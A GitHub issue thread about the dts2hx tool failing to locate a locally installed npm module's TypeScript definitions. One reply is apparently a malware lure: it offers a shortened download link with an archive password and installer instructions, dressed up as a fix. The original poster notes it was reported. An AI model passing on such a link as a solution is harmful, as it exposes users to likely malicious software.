### ISSUE TITLE
dts2hx can't find module in node_modules

### ISSUE THREAD

**Issue by Kyliathy** [haxiomic/dts2hx#130]
Having a very strange issue, which is probably caused by me not understanding something (simple?) about how dts2hx works.

I have this dumb-as-possible library:

https://github.com/Nexus-B1/shardyard

Then, as a good user of dts2hx, I install it in an "extern-builder" project, using `npm pack` and `npm install <path>`. The library looks fine in the node_modules of the "extern-builder" project. As in, it's there, along with all node_modules it itself requires.

Then I run `npx dts2hx shardyard`. What I get is:

"> Converting module shardyard
> Error: Failed to find typescript for module "shardyard". Searched the following paths:"

And what follows is a bunch of file names and paths of it (dts2hx) looking for `shardyard.ts`, `tsx`, `d.ts`. But it is looking in the wrong place and for the wrong files. It searches for lower case shardyard, and for index.ts, of which I have none. Also, for whatever reason, it searches for them in the root of `node_modules` instead of `node_modules/shardyard`.

I see dts2hx hasn't been updated in a long time, but it still seems to work on my system for other libraries such as mysql (although it throws a ton of errors when creating externs for it, but at least it outputs SOMETHING, so it must be MY use of it that is wrong).

But I still file this as an issue because I think there is probably some improvement in the documentation that is also necessary, like to explain WHY dts2hx looks for modules the way it does and how to make it succeed finding the modules :)

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Kyliathy** [comment]
Uh, yeah, I reported that :).
